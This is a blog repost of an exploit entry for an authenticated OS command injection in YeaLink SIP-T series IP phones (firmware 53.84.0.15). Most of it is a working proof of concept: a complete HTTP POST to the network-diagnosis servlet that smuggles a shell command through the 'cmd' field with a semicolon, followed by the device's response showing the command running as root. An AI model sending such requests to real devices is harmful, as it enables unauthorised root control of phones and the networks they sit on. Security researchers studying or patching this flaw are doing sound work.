Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86382584

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
# Date: 11-10-2021
# Exploit Author: tahaafarooq
# Vendor Homepage: https://www.yealink.com/
# Version: 53.84.0.15
# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)

Description: 

Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection

POC:

POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=; id;&token=1714636915c6acea98

-------------------------------------------------

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<html>
<body>
	<div id="_RES_INFO_">
            uid=0(root) gid=0(root)
        </div>
</body>
</html>